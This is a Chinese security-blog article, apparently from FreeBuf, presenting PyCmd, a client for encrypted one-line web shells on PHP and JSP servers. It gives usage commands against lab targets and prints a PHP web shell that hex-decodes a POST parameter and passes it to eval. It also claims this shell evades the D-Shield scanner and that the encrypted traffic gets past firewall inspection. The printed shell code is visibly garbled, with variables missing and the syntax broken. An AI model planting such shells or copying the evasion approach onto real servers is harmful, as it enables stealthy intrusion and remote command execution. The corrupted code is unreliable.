淺析PyCmd加密隱形木馬

之前寫了一個基於python的一句話木馬客戶端程序，這個程序的作用大致就是為了繞過防護設備，使敏感數據能在網路里自由穿梭。由於編程能力有限，當時以python程序作為客戶端，php代碼作為服務端，勉強能用，但是缺乏jsp的服務端，使之功能很局限。幸好有大神

caomei相助

<點擊閱讀原文查看鏈接>

PyCmd適用環境

當伺服器允許上傳任意文件，且對文件內容不進行審計檢查，但由於其網路邊界有防火牆會攔截審計通信的數據。這時我們能成功上傳一句話木馬，然而連接菜刀的時候會出現500錯誤，此時可以使用pycmd工具，因為其會對互相通信的內容加密處理。

PyCmd使用

我這裡準備了2個靶機，分別裝有php與jsp的運行環境，用來模擬真實的網站伺服器。

為了方便，我已經把服務端木馬程序放到了伺服器網站目錄下：

php網站木馬地址：10.0.3.13/test/p.php

jsp網站木馬地址： 

192.168.10.149:8080/headgmp/upload/2017_07_13/11.jsp

查看shell的情況：

此時，運行PyCmd.py程序：

python PyCmd.py -u http://10.0.3.13/test/p.php -p test

[-

-proxy]

或者

python PyCmd.py -u http://192.168.10.149:8080/headgmp/upload/2017_07_13/11.jsp -p test [--proxy]

程序會自動判斷輸入的網站類型，這裡是jsp類型的網站。

運行程序可輸入以下參數：

-h 查看幫助信息

-u 網站木馬地址

-p 木馬shell密碼

–proxy 開啟本地代理（方便調試）

註：當開啟本地調試，需運行Fiddler程序，或者其他抓包軟體。

PyCmd數據加密

PyCmd程序的長處在於它對往來的數據進行了加密，可以繞過防火牆對數據內容的校驗。

當執行cmd命令時，通過Fiddler抓包查看數據：

查看回報信息：

PyCmd木馬隱身

用D盾掃描上傳的木馬服務端文件，顯示為正常文件，成功躲過查殺（2016.9.18日檢測結果）

這裡演示php木馬查殺：

<?php

$string=』』;

$password=』test』;

if(isset(password])){

_POST[$password];

for(i<strlen(i+=2){

hex[hex[$i+1]));

}

@eval($string);

}else{

echo 「This is a Test!」;

}

?>

工具下載

PyCmd 下載地址

<點擊閱讀原文查看鏈接>

項目地址：https://github.com/tengzhangchao/PyCmd

說明：繞過防火牆檢測的方法很多，這裡只是提供了一種思路，pycmd是我去年寫的一款工具，最近打算完善其功能，代碼已經開源。

原文連接：PyCmd 加密隱形木馬

<點擊閱讀原文查看鏈接>

* 本文作者：nmask，轉載請註明來自FreeBuf.COM

喜歡這篇文章嗎？立刻分享出去讓更多人知道吧！